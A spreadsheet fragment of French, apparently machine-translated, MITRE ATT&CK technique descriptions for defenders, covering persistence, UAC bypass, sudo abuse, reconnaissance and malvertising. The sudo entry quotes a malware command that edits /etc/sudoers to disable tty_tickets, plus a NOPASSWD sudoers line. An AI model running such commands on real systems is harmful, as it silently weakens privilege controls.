[PowerShell](https://attack.mitre.org/techniques/T1059/001) Prend en charge plusieurs profils en fonction de l’utilisateur ou du programme hôte. Par exemple, il peut exister différents profils pour les programmes hôtes [PowerShell](https://attack.mitre.org/techniques/T1059/001) tels que la console PowerShell, PowerShell ISE ou Visual Studio Code. Un administrateur peut également configurer un profil qui s’applique à tous les utilisateurs et programmes hôtes sur l’ordinateur local. (Citation : Microsoft à propos des profils) 
Les adversaires peuvent modifier ces profils pour inclure des commandes, des fonctions, des modules et/ou des lecteurs [PowerShell](https://attack.mitre.org/techniques/T1059/001) arbitraires afin d’obtenir une persistance. Chaque fois qu’un utilisateur ouvre une session [PowerShell](https://attack.mitre.org/techniques/T1059/001), le script modifié est exécuté, sauf si l’indicateur &lt;code&gt;-NoProfile&lt;/code&gt; est utilisé lors de son lancement. (Citation : ESET Turla PowerShell mai 2019) 
Un adversaire peut également être en mesure d’élever les privilèges si un script dans un profil PowerShell est chargé et exécuté par un compte disposant de privilèges plus élevés, tel qu’un administrateur de domaine. (Citation : Wits End et profils PowerShell louches)
https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de diverses implémentations de JavaScript pour l’exécution. JavaScript (JS) est un langage de script indépendant de la plate-forme (compilé juste-à-temps au moment de l’exécution) généralement associé aux scripts des pages Web, bien que JS puisse être exécuté dans des environnements d’exécution en dehors du navigateur. (Citation : NodeJS)
JScript est l’implémentation Microsoft de la même norme de script. JScript est interprété via le moteur de script Windows et donc intégré à de nombreux composants de Windows tels que les pages [Component Object Model](https://attack.mitre.org/techniques/T1559/001) et Internet Explorer HTML Application (HTA). (Citation : JScrip mai 2018)(Citation : Microsoft JScript 2007)(Citation : Scripts Microsoft Windows)
JavaScript for Automation (JXA) est un langage de script macOS basé sur JavaScript, inclus dans l’architecture Open Scripting Architecture (OSA) d’Apple, qui a été introduit dans OSX 10.10. L’OSA d’Apple fournit des capacités de script pour contrôler les applications, s’interfacer avec le système d’exploitation et faire le lien entre l’accès au reste des API internes d’Apple. À partir d’OSX 10.10, OSA ne prend en charge que deux langues, JXA et [AppleScript](https://attack.mitre.org/techniques/T1059/002). Les scripts peuvent être exécutés via l’utilitaire de ligne de commande &lt;code&gt;osascript&lt;/code&gt;, ils peuvent être compilés dans des applications ou des fichiers de script via &lt;code&gt;osacompile&lt;/code&gt;, et ils peuvent être compilés et exécutés en mémoire d’autres programmes en exploitant le framework OSAKit. (Citation : Apple À propos de Mac Scripting 2016)(Citation : SpecterOps JXA 2020)(Citation : SentinelOne macOS Red Team)(Citation : Moineau argenté Red Canary, février 2021)(Citation : MDSec macOS JXA et VSCode)
Les adversaires peuvent abuser de diverses implémentations de JavaScript pour exécuter divers comportements. Les utilisations courantes incluent l’hébergement de scripts malveillants sur des sites Web dans le cadre d’une [compromission intempestive](https://attack.mitre.org/techniques/T1189) ou le téléchargement et l’exécution de ces fichiers de script en tant que charges utiles secondaires. Étant donné que ces charges utiles sont basées sur du texte, il est également très courant que des adversaires obscurcissent leur contenu dans le cadre de [Fichiers ou informations obscurcis](https://attack.mitre.org/techniques/T1027).
https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le DNS de la victime qui peuvent être utilisées lors du ciblage. Les informations DNS peuvent inclure divers détails, y compris des serveurs de noms enregistrés ainsi que des enregistrements qui décrivent l’adressage pour les sous-domaines, les serveurs de messagerie et autres hôtes d’une cible. Les enregistrements DNS MX, TXT et SPF peuvent également révéler l’utilisation de fournisseurs de cloud et de SaaS tiers, tels qu’Office 365, G Suite, Salesforce ou Zendesk. (Citation : Sean Metcalf Twitter DNS records)
Les adversaires peuvent collecter ces informations de différentes manières, par exemple en interrogeant ou en collectant des détails via [DNS/DNS passif](https://attack.mitre.org/techniques/T1596/001). Les informations DNS peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)). (Citation : benne à ordures DNS)(Citation : Circl DNS passif) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596), [Recherche dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Analyse active](https://attack.mitre.org/techniques/T1595)), l’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure]( https://attack.mitre.org/techniques/T1584)), et/ou l’accès initial (ex : [Services à distance externes](https://attack.mitre.org/techniques/T1133)).
Les adversaires peuvent également utiliser le transfert de zone DNS (requête DNS de type AXFR) pour collecter tous les enregistrements d’un serveur DNS mal configuré. (Citation : Trails-DNS)(Citation : DNS-CISA)(Citation : Alexa-dns)
https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les politiques de cycle de vie d’un compartiment de stockage cloud pour détruire tous les objets qui y sont stockés.  
Les compartiments de stockage dans le cloud permettent souvent aux utilisateurs de définir des politiques de cycle de vie pour automatiser la migration, l’archivage ou la suppression d’objets après une période de temps définie. (Référence : Cycles de vie du stockage AWS)(Citation : Cycles de vie du stockage GCP)(Citation : Cycles de vie du stockage Azure) Si un auteur de menace dispose des autorisations suffisantes pour modifier ces politiques, il peut être en mesure de supprimer tous les objets en même temps. 
Par exemple, dans les environnements AWS, un adversaire disposant de l’autorisation « PutLifecycleConfiguration » peut utiliser l’appel d’API « PutBucketLifecycle » pour appliquer une politique de cycle de vie à un compartiment S3 qui supprime tous les objets du compartiment au bout d’un jour. (Citation : Ransomware de Palo Alto Cloud) Outre la destruction de données à des fins d’extorsion et de [vol financier](https://attack.mitre.org/techniques/T1657), les adversaires peuvent également effectuer cette action sur des compartiments stockant des journaux cloud pour [Suppression de l’indicateur](https://attack.mitre.org/techniques/T1070). (Référence : Datadog S3 Lifecycle CloudTrail Logs)
https://attack.mitre.org/techniques/T1485/001</t>
  </si>
  <si>
    <t>Un adversaire peut exploiter les périphériques d’un ordinateur (par exemple, les microphones et les webcams) ou les applications (par exemple, les services d’appels vocaux et vidéo) pour capturer des enregistrements audio dans le but d’écouter des conversations sensibles afin de recueillir des informations. (Citation : ESET Attor octobre 2019)
Des logiciels malveillants ou des scripts peuvent être utilisés pour interagir avec les appareils via une API disponible fournie par le système d’exploitation ou une application de capture audio. Les fichiers audio peuvent être écrits sur le disque et exfiltrés ultérieurement.
https://attack.mitre.org/techniques/T1123</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des processus au niveau du système pour exécuter de manière répétée des charges utiles malveillantes dans le cadre de la persistance. Lorsque les systèmes d’exploitation démarrent, ils peuvent démarrer des processus qui exécutent des fonctions système en arrière-plan. Sous Windows et Linux, ces processus système sont appelés services. (Citation : TechNet Services) Sous macOS, les processus launchd connus sous le nom de [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) et [Launch Agent](https://attack.mitre.org/techniques/T1543/001) sont exécutés pour terminer l’initialisation du système et charger les paramètres spécifiques à l’utilisateur. (Citation : démons de l’agent de lancement AppleDocs) 
Les adversaires peuvent installer de nouveaux services, démons ou agents qui peuvent être configurés pour s’exécuter au démarrage ou à un intervalle reproductible afin d’établir la persistance. De même, les adversaires peuvent modifier des services, des démons ou des agents existants pour obtenir le même effet.  
Les services, les démons ou les agents peuvent être créés avec des privilèges d’administrateur, mais exécutés avec des privilèges root/SYSTEM. Les adversaires peuvent exploiter cette fonctionnalité pour créer ou modifier des processus système afin d’élever les privilèges. (Citation : Détection des logiciels malveillants OSX)
https://attack.mitre.org/techniques/T1543</t>
  </si>
  <si>
    <t>Les adversaires peuvent tirer parti de services à distance externes pour accéder initialement à un réseau et/ou y persister. Les services à distance tels que les VPN, Citrix et d’autres mécanismes d’accès permettent aux utilisateurs de se connecter aux ressources du réseau interne de l’entreprise à partir d’emplacements externes. Il existe souvent des passerelles de service distantes qui gèrent les connexions et l’authentification des informations d’identification pour ces services. Des services tels que [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) et [VNC](https://attack.mitre.org/techniques/T1021/005) peuvent également être utilisés en externe. (Citation : Logiciel MacOS VNC pour le bureau à distance)
L’accès à [Comptes valides](https://attack.mitre.org/techniques/T1078) pour utiliser le service est souvent une exigence, qui peut être obtenue par le biais du pharming d’identifiants ou en obtenant les identifiants des utilisateurs après avoir compromis le réseau d’entreprise. (Citation : Volexity Virtual Private Keylogging) L’accès aux services distants peut être utilisé comme mécanisme d’accès redondant ou persistant au cours d’une opération.
L’accès peut également être obtenu par le biais d’un service exposé qui ne nécessite pas d’authentification. Dans les environnements conteneurisés, il peut s’agir d’une API Docker exposée, d’un serveur d’API Kubernetes, d’un kubelet ou d’une application web telle que le tableau de bord Kubernetes. (Citation : Trend Micro Exposed Docker Server)(Citation : Unité 42 Hildegard Malware)
https://attack.mitre.org/techniques/T1133</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir la persistance en exécutant du contenu malveillant déclenché par l’exécution de fichiers binaires corrompus. Les binaires Mach-O ont une série d’en-têtes qui sont utilisés pour effectuer certaines opérations lorsqu’un binaire est chargé. L’en-tête LC_LOAD_DYLIB d’un binaire Mach-O indique à macOS et OS X les bibliothèques dynamiques (dylibs) à charger pendant l’exécution. Ceux-ci peuvent être ajoutés ad hoc au binaire compilé tant que des ajustements sont apportés au reste des champs et dépendances. (Citation : Écrire un mauvais logiciel malveillant pour OSX) Des outils sont disponibles pour effectuer ces modifications.
Les adversaires peuvent modifier les en-têtes binaires Mach-O pour charger et exécuter des dylibs malveillants à chaque fois que le binaire est exécuté. Bien que toute modification invalide les signatures numériques sur les fichiers binaires car le fichier binaire est en cours de modification, cela peut être corrigé en supprimant simplement la commande LC_CODE_SIGNATURE du fichier binaire afin que la signature ne soit pas vérifiée au moment du chargement. (Citation : Persistance des logiciels malveillants sur OS X)
https://attack.mitre.org/techniques/T1546/006</t>
  </si>
  <si>
    <t>Un adversaire peut voler des cookies de session d’applications Web ou de services et les utiliser pour accéder à des applications Web ou à des services Internet en tant qu’utilisateur authentifié sans avoir besoin d’informations d’identification. Les applications et services Web utilisent souvent des cookies de session comme jeton d’authentification une fois qu’un utilisateur s’est authentifié sur un site Web.
Les cookies sont souvent valables pour une période prolongée, même si l’application web n’est pas utilisée activement. Les cookies se trouvent sur le disque, dans la mémoire du navigateur et dans le trafic réseau vers des systèmes distants. En outre, d’autres applications sur la machine cible peuvent stocker des cookies d’authentification sensibles en mémoire (par exemple, des applications qui s’authentifient auprès des services cloud). Les cookies de session peuvent être utilisés pour contourner certains protocoles d’authentification multifactorielle. (Citation : Passez le cookie)
Il existe plusieurs exemples de logiciels malveillants ciblant les cookies des navigateurs Web sur le système local. (Référence : Kaspersky TajMahal, avril 2019)(Citation : Unit 42 Mac Crypto Cookies Janvier 2019) Les adversaires peuvent également voler des cookies en injectant du contenu JavaScript malveillant dans des sites Web ou en s’appuyant sur [User Execution](https://attack.mitre.org/techniques/T1204) en incitant les victimes à exécuter du JavaScript malveillant dans leur navigateur. (Citation : Talos Roblox Scam 2023)(Citation : Favoris Discord de Krebs 2023)
Il existe également des frameworks open source tels que « Evilginx2 » et « Muraena » qui peuvent collecter des cookies de session via un proxy malveillant (par exemple, [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) qui peuvent être configurés par un adversaire et utilisés dans des campagnes de phishing. (Citation : Github evilginx2)(Citation : GitHub Mauraena)
Une fois qu’un adversaire a acquis un cookie valide, il peut ensuite exécuter une technique [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) pour se connecter à l’application Web correspondante.
https://attack.mitre.org/techniques/T1539</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de la fonctionnalité de planification des tâches fournie par les outils d’orchestration de conteneurs tels que Kubernetes pour planifier le déploiement de conteneurs configurés pour exécuter du code malveillant. Les tâches d’orchestration de conteneurs exécutent ces tâches automatisées à une date et une heure spécifiques, comme les tâches cron sur un système Linux. Les déploiements de ce type peuvent également être configurés pour maintenir une quantité de conteneurs au fil du temps, ce qui automatise le processus de maintien de la persistance au sein d’un cluster.
Dans Kubernetes, un CronJob peut être utilisé pour planifier un Job qui exécute un ou plusieurs conteneurs afin d’effectuer des tâches spécifiques. (Citation : Emplois Kubernetes)(Citation : Kubernetes CronJob) Par conséquent, un adversaire peut utiliser un CronJob pour planifier le déploiement d’un Job qui exécute du code malveillant dans divers nœuds d’un cluster. (Citation : Matrice des menaces pour Kubernetes)
https://attack.mitre.org/techniques/T1053/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des algorithmes de génération de domaine (DGA) pour identifier dynamiquement un domaine de destination pour le trafic de commande et de contrôle plutôt que de s’appuyer sur une liste d’adresses IP statiques ou de domaines. Cela a l’avantage de rendre beaucoup plus difficile pour les défenseurs de bloquer, de suivre ou de prendre le contrôle du canal de commande et de contrôle, car il peut y avoir des milliers de domaines que les logiciels malveillants peuvent vérifier pour obtenir des instructions. (Citation : Cybereason dissèquant les DGA)(Citation : Cisco Umbrella DGA)(Citation : Unité 42 DGA février 2019)
Les DGA peuvent prendre la forme de chaînes apparemment aléatoires ou de « charabia » (ex : istgmxdejdnxuyla.ru) lorsqu’elles construisent des noms de domaine en générant chaque lettre. Alternativement, certains DGA utilisent des mots entiers comme unité en concaténant des mots ensemble au lieu de lettres (ex : cityjulydish.net). De nombreux DGA sont basés sur le temps, générant un domaine différent pour chaque période (horaire, quotidienne, mensuelle, etc.). D’autres intègrent également une valeur de départ pour rendre la prédiction des domaines futurs plus difficile pour les défenseurs. (Citation : Cybereason dissèquant les DGA)(Citation : Cisco Umbrella DGA)(Citation : Talos CCleanup 2017)(Référence : Akamai DGA Mitigation)
Les adversaires peuvent utiliser les DGA à des fins de [canaux de secours](https://attack.mitre.org/techniques/T1008). Lorsque le contact est perdu avec le serveur de commande et de contrôle principal, les logiciels malveillants peuvent utiliser un DGA comme moyen de rétablir la commande et le contrôle. (Citation : Talos CCleanup 2017)(Citation : FireEye POSHSPY avril 2017)(Citation : Activité ESET Sednit 2017)
https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser d’une double extension dans le nom de fichier afin de masquer le véritable type de fichier. Un nom de fichier peut inclure une extension de type de fichier secondaire qui peut entraîner l’affichage uniquement de la première extension (ex : &lt;code&gt;File.txt.exe&lt;/code&gt; peut s’afficher dans certaines vues comme &lt;code&gt;File.txt&lt;/code&gt;). Cependant, la deuxième extension est le type de fichier réel qui détermine la façon dont le fichier est ouvert et exécuté. L’extension de fichier réelle peut être cachée par le système d’exploitation dans le navigateur de fichiers (ex : explorer.exe), ainsi que dans tout logiciel configuré à l’aide ou similaire aux politiques du système. (Citation : PCMag DoubleExtension)(Citation : SOCPrime DoubleExtension) 
Les adversaires peuvent abuser des doubles extensions pour tenter de dissimuler des types de fichiers dangereux de charges utiles. Une utilisation très courante consiste à inciter un utilisateur à ouvrir ce qu’il pense être un type de fichier inoffensif mais qui est en fait du code exécutable. Ces fichiers se font souvent passer pour des pièces jointes à un e-mail et permettent à un adversaire d’obtenir [Accès initial](https://attack.mitre.org/tactics/TA0001) dans le système d’un utilisateur via [Pièce jointe pour hameçonnage criminel](https://attack.mitre.org/techniques/T1566/001) puis [Exécution par l’utilisateur](https://attack.mitre.org/techniques/T1204). Par exemple, une pièce jointe de fichier exécutable nommée &lt;code&gt;Evil.txt.exe&lt;/code&gt; peut &lt;code&gt;s’afficher comme Evil.txt&lt;/code&gt; pour un utilisateur. L’utilisateur peut alors le visualiser comme un fichier texte inoffensif et l’ouvrir, exécutant par inadvertance le logiciel malveillant caché. (Citation : SOCPrime DoubleExtension)
Les types de fichiers courants, tels que les fichiers texte (.txt, .doc, etc.) et les fichiers image (.jpg, .gif, etc.) sont généralement utilisés comme première extension à apparaître inoffensive. Les extensions exécutables généralement considérées comme dangereuses, telles que .exe, .lnk, .hta et .scr, apparaissent souvent comme la deuxième extension et le véritable type de fichier.
https://attack.mitre.org/techniques/T1036/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les mécanismes UAC pour élever les privilèges de processus sur le système. Le contrôle de compte d’utilisateur (UAC) Windows permet à un programme d’élever ses privilèges (suivis par des niveaux d’intégrité allant de faible à élevé) pour effectuer une tâche sous des autorisations de niveau administrateur, éventuellement en demandant à l’utilisateur de confirmer. L’impact pour l’utilisateur va du refus de l’opération dans le cadre d’une application stricte à l’autorisation de l’utilisateur d’effectuer l’action s’il fait partie du groupe d’administrateurs locaux et clique sur l’invite, ou à la possibilité de saisir un mot de passe administrateur pour terminer l’action.
Si le niveau de protection UAC d’un ordinateur n’est pas le niveau le plus élevé, certains programmes Windows peuvent élever les privilèges ou exécuter des objets élevés [Component Object Model](https://attack.mitre.org/techniques/T1559/001) sans demander à l’utilisateur via la boîte de notification UAC. (Citation : TechNet à l’intérieur de l’UAC)(Citation : MSDN COM Elevation) Par exemple, l’utilisation de [Rundll32](https://attack.mitre.org/techniques/T1218/011) pour charger une DLL spécialement conçue qui charge un objet [Component Object Model](https://attack.mitre.org/techniques/T1559/001) à élévation automatique et effectue une opération de fichier dans un répertoire protégé qui nécessiterait généralement un accès élevé. Un logiciel malveillant peut également être injecté dans un processus approuvé pour obtenir des privilèges élevés sans inviter l’utilisateur. (Citation : Davidson Windows)
De nombreuses méthodes ont été découvertes pour contourner l’UAC. La page Readme Github pour UACME contient une liste exhaustive de méthodes (Citation : Github UACMe) qui ont été découvertes et mises en œuvre, mais il se peut qu’il ne s’agisse pas d’une liste exhaustive de contournements. D’autres méthodes de contournement sont régulièrement découvertes et certaines utilisées dans la nature, telles que :
* &lt;code&gt;eventvwr.exe&lt;/code&gt; pouvez élever automatiquement et exécuter un binaire ou un script spécifié. (Citation : enigma0x3 Fileless UAC Bypass)(Citation : Fortinet Fareit)
Un autre contournement est possible grâce à certaines techniques de mouvement latéral si les informations d’identification d’un compte avec des privilèges d’administrateur sont connues, car l’UAC est un mécanisme de sécurité de système unique et le privilège ou l’intégrité d’un processus exécuté sur un système sera inconnu sur les systèmes distants et sera par défaut à haute intégrité. (Citation : Contournement SANS UAC)
https://attack.mitre.org/techniques/T1548/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les services de messagerie pour pomper des SMS, ce qui peut avoir un impact sur la disponibilité du système et/ou du service hébergé. (Citation : Twilio SMS Pumping) Le pompage de SMS est un type de fraude dans le domaine des télécommunications par lequel un auteur de menace obtient d’abord un ensemble de numéros de téléphone d’un fournisseur de services de télécommunications, puis exploite l’infrastructure de messagerie d’une victime pour envoyer de grandes quantités de messages SMS à des numéros de cet ensemble. En générant du trafic SMS vers son numéro de téléphone défini, un auteur de menace peut gagner des paiements de la part du fournisseur de télécommunications. (Citation : Fraude au pompage de SMS Twilio)
Les auteurs de menace utilisent souvent des formulaires Web accessibles au public, tels que des mots de passe à usage unique (OTP) ou des champs de vérification de compte, afin de générer du trafic SMS. Ces champs peuvent exploiter des services tels que Twilio, AWS SNS et Amazon Cognito en arrière-plan. (Citation : Twilio SMS Pumping)(Référence : AWS RE :Inforce Threat Detection 2024) En réponse à la grande quantité de demandes, les coûts des SMS peuvent augmenter et les canaux de communication peuvent être débordés. (Citation : Twilio SMS Pumping)
https://attack.mitre.org/techniques/T1496/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent vérifier la connectivité Internet sur les systèmes compromis. Cela peut être effectué lors de la découverte automatisée et peut être accompli de nombreuses façons, telles que l’utilisation de [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt; et de requêtes GET vers des sites Web.
Les adversaires peuvent utiliser les résultats et les réponses de ces demandes pour déterminer si le système est capable de communiquer avec leurs serveurs C2 avant de tenter de s’y connecter. Les résultats peuvent également être utilisés pour identifier les routes, les redirecteurs et les serveurs proxy.
https://attack.mitre.org/techniques/T1016/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer une mise en cache sudo et/ou utiliser le fichier sudoers pour élever les privilèges. Les adversaires peuvent le faire pour exécuter des commandes en tant qu’autres utilisateurs ou générer des processus avec des privilèges plus élevés.
Dans les systèmes Linux et MacOS, sudo (parfois appelé « superuser do ») permet aux utilisateurs d’exécuter des commandes à partir de terminaux disposant de privilèges élevés et de contrôler qui peut exécuter ces commandes sur le système. La commande &lt;code&gt;sudo&lt;/code&gt; « permet à un administrateur système de déléguer l’autorité pour donner à certains utilisateurs (ou groupes d’utilisateurs) la possibilité d’exécuter certaines (ou toutes) commandes en tant qu’utilisateur root ou un autre utilisateur tout en fournissant une piste d’audit des commandes et de leurs arguments. » (Citation : sudo man page 2018) Étant donné que sudo a été conçu pour l’administrateur système, il dispose de certaines fonctionnalités de configuration utiles telles qu’un &lt;code&gt;timestamp_timeout&lt;/code&gt;, qui est le temps en minutes entre les instances de &lt;code&gt;sudo&lt;/code&gt; avant qu’il ne vous demande à nouveau un mot de passe. En effet, &lt;code&gt;sudo&lt;/code&gt; a la capacité de mettre en cache les informations d’identification pendant un certain temps. Sudo crée (ou touche) un fichier dans &lt;code&gt;/var/db/sudo&lt;/code&gt; avec un horodatage de la dernière exécution de sudo pour déterminer ce délai d’expiration. De plus, il existe une variable &lt;code&gt;tty_tickets&lt;/code&gt; qui traite chaque nouvelle tty (session terminale) de manière isolée. Cela signifie, par exemple, que le délai d’expiration sudo d’un tty n’affectera pas un autre tty (vous devrez taper à nouveau le mot de passe).
Le fichier sudoers, &lt;code&gt;/etc/sudoers&lt;/code&gt;, décrit quels utilisateurs peuvent exécuter quelles commandes et à partir de quels terminaux. Cela décrit également les commandes que les utilisateurs peuvent exécuter en tant qu’autres utilisateurs ou groupes. Cela fournit le principe du moindre privilège, de sorte que les utilisateurs s’exécutent avec leurs autorisations les plus faibles possibles la plupart du temps et n’accèdent à d’autres utilisateurs ou autorisations que si nécessaire, généralement en demandant un mot de passe. Cependant, le fichier sudoers peut également spécifier quand ne pas demander aux utilisateurs des mots de passe avec une ligne comme &lt;code&gt;user1 ALL=(ALL) NOPASSWD : ALL.&lt;/code&gt; (Référence : OSX. Cependant, des privilèges élevés sont nécessaires pour modifier ce fichier.
Les adversaires peuvent également abuser des mauvaises configurations de ces mécanismes pour élever les privilèges sans avoir besoin du mot de passe de l’utilisateur. Par exemple, l’horodatage de &lt;code&gt;/var/db/sudo&lt;/code&gt; peut être surveillé pour voir s’il se situe dans la plage &lt;code&gt;timestamp_timeout&lt;/code&gt;. Si c’est le cas, les logiciels malveillants peuvent exécuter des commandes sudo sans avoir à fournir le mot de passe de l’utilisateur. De plus, si &lt;code&gt;tty_tickets&lt;/code&gt; est désactivé, les adversaires peuvent le faire à partir de n’importe quel tty pour cet utilisateur.
Dans la nature, les logiciels malveillants &lt;code&gt;ont désactivé tty_tickets&lt;/code&gt; pour faciliter potentiellement la création de scripts en émettant &lt;code&gt;echo 'Defaults !tty_tickets' &gt;&gt; /etc/sudoers&lt;/code&gt;. (Citation : cybereason osx proton) Pour que ce changement soit pris en compte, le logiciel malveillant a également publié &lt;code&gt;killall Terminal&lt;/code&gt;. À partir de macOS Sierra, le fichier sudoers &lt;code&gt;a tty_tickets&lt;/code&gt; activé par défaut.
https://attack.mitre.org/techniques/T1548/003</t>
  </si>
  <si>
    <t>Un adversaire peut compresser ou chiffrer les données collectées avant l’exfiltration à l’aide d’une méthode personnalisée. Les adversaires peuvent choisir d’utiliser des méthodes d’archivage personnalisées, telles que le chiffrement avec XOR ou les chiffrements de flux mis en œuvre sans références de bibliothèque ou d’utilitaire externes. Des implémentations personnalisées d’algorithmes de compression bien connus ont également été utilisées. (Citation : ESET Sednit Partie 2)
https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>Un adversaire peut tenter de modifier l’infrastructure de service de calcul d’un compte cloud pour échapper aux défenses. Une modification de l’infrastructure du service de calcul peut inclure la création, la suppression ou la modification d’un ou plusieurs composants tels que des instances de calcul, des machines virtuelles et des instantanés.
Les autorisations obtenues lors de la modification des composants de l’infrastructure peuvent contourner les restrictions qui empêchent l’accès à l’infrastructure existante. La modification des composants de l’infrastructure peut également permettre à un adversaire d’échapper à la détection et de supprimer les preuves de leur présence. (Citation : Mandiant M-Trends 2020)
https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre les périphériques réseau tiers qui peuvent être utilisés lors du ciblage. Les périphériques réseau, tels que les routeurs de petits bureaux/bureaux à domicile (SOHO), peuvent être compromis lorsque l’objectif ultime de l’adversaire n’est pas [l’accès initial](https://attack.mitre.org/tactics/TA0001) à cet environnement, mais plutôt d’exploiter ces périphériques pour prendre en charge un ciblage supplémentaire.
Une fois qu’un adversaire a pris le contrôle, les périphériques réseau compromis peuvent être utilisés pour lancer des opérations supplémentaires, telles que l’hébergement de charges utiles pour des campagnes de [phishing](https://attack.mitre.org/techniques/T1566) (c’est-à-dire [Link Target](https://attack.mitre.org/techniques/T1608/005)) ou l’activation de l’accès requis pour exécuter des opérations [Content Injection](https://attack.mitre.org/techniques/T1659). Les adversaires peuvent également être en mesure de collecter des informations d’identification réutilisables (c’est-à-dire [Comptes valides](https://attack.mitre.org/techniques/T1078)) à partir de périphériques réseau compromis.
Les adversaires ciblent souvent les appareils de périphérie connectés à Internet et les appliances réseau associées qui ne prennent pas en charge les défenses robustes basées sur l’hôte. (Citation : Mandiant Fortinet Zero Day)(Citation : Cyberguerre câblée de la Russie)
Les périphériques réseau compromis peuvent être utilisés pour prendre en charge les activités ultérieures de [Command and Control](https://attack.mitre.org/tactics/TA0011), telles que [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) via un réseau [Proxy](https://attack.mitre.org/techniques/T1090) et/ou [Botnet](https://attack.mitre.org/techniques/T1584/005). (Référence : Justice GRU 2024)
https://attack.mitre.org/techniques/T1584/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter des publicités en ligne qui peuvent être utilisées à mauvais escient pour distribuer des logiciels malveillants aux victimes. Les annonces peuvent être achetées pour planter et positionner favorablement des artefacts à des endroits spécifiques en ligne, par exemple en bonne place dans les résultats des moteurs de recherche. Ces publicités peuvent rendre plus difficile pour les utilisateurs de faire la distinction entre les résultats de recherche réels et les publicités. (Citation : spamhaus-malvertising) Les publicités achetées peuvent également cibler des publics spécifiques en utilisant les capacités du réseau publicitaire, ce qui permet de tirer parti de la confiance inhérente accordée aux moteurs de recherche et aux sites Web populaires. 
Les adversaires peuvent acheter des publicités et d’autres ressources pour aider à distribuer des artefacts contenant du code malveillant aux victimes. Les publicités achetées peuvent tenter d’usurper l’identité de marques connues ou de les usurper. Par exemple, ces publicités usurpées peuvent inciter les victimes à cliquer sur l’annonce, ce qui peut ensuite les envoyer vers un domaine malveillant qui peut être un clone de sites Web officiels contenant des versions trojanisées du logiciel annoncé. (Citation : Masquerads-Guardio)(Citation : FBI-search) Les efforts de l’adversaire pour créer des domaines malveillants et acheter des publicités peuvent également être automatisés à grande échelle afin de mieux résister aux efforts de nettoyage. (Citation : sentinelone-malvertising) 
Le malvertising peut être utilisé pour soutenir [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) et [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), nécessitant potentiellement une interaction limitée de la part de l’utilisateur si l’annonce contient du code/des exploits qui infectent le navigateur Web du système cible. (Citation : BBC-malvertising)
Les adversaires peuvent également employer plusieurs techniques pour échapper à la détection par le réseau publicitaire. Par exemple, les adversaires peuvent acheminer dynamiquement les clics sur les annonces pour envoyer le trafic automatisé des robots d’indexation/application des règles vers des sites inoffensifs, tout en validant les cibles potentielles, puis en envoyant les victimes renvoyées à partir de clics réels sur des annonces vers des pages malveillantes. Ce vecteur d’infection peut donc rester caché du réseau publicitaire ainsi que de tout visiteur qui n’accède pas aux sites malveillants avec un identifiant valide en cliquant sur la publicité. (Citation : Masquerads-Guardio) D’autres astuces, telles que des fautes de frappe intentionnelles pour éviter la surveillance de la réputation de la marque, peuvent également être utilisées pour échapper à la détection automatique. (Citation : spamhaus-malvertising)
https://attack.mitre.org/techniques/T1583/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de découvrir les paramètres de groupe et d’autorisation. Ces informations peuvent aider les adversaires à déterminer quels comptes d’utilisateurs et quels groupes sont disponibles, l’appartenance des utilisateurs à des groupes particuliers et quels utilisateurs et groupes disposent d’autorisations élevées.
Les adversaires peuvent tenter de découvrir les paramètres d’autorisation de groupe de différentes manières. Ces données peuvent fournir à l’adversaire des informations sur l’environnement compromis qui peuvent être utilisées dans le cadre d’activités de suivi et de ciblage. (Citation : CrowdStrike BloodHound avril 2018)
https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler l’adresse e-mail de l’utilisateur pour collecter des informations sensibles. Les e-mails peuvent contenir des données sensibles, notamment des secrets commerciaux ou des informations personnelles, qui peuvent s’avérer précieuses pour les adversaires. Les e-mails peuvent également contenir des détails sur les opérations de réponse aux incidents en cours, ce qui peut permettre aux adversaires d’ajuster leurs techniques afin de maintenir la persistance ou d’échapper aux défenses. (Citation : TrustedSec OOB Communications)(Référence : CISA AA20-352A 2021) Les adversaires peuvent collecter ou transférer des e-mails à partir de serveurs de messagerie ou de clients.
https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’extraire des informations d’identification de la base de données SAM (Security Account Manager) soit par des techniques en mémoire, soit par le biais du registre Windows où la base de données SAM est stockée. Le SAM est un fichier de base de données qui contient les comptes locaux de l’hôte, généralement ceux trouvés avec la commande &lt;code&gt;net user&lt;/code&gt;. L’énumération de la base de données SAM nécessite un accès au niveau SYSTEM.
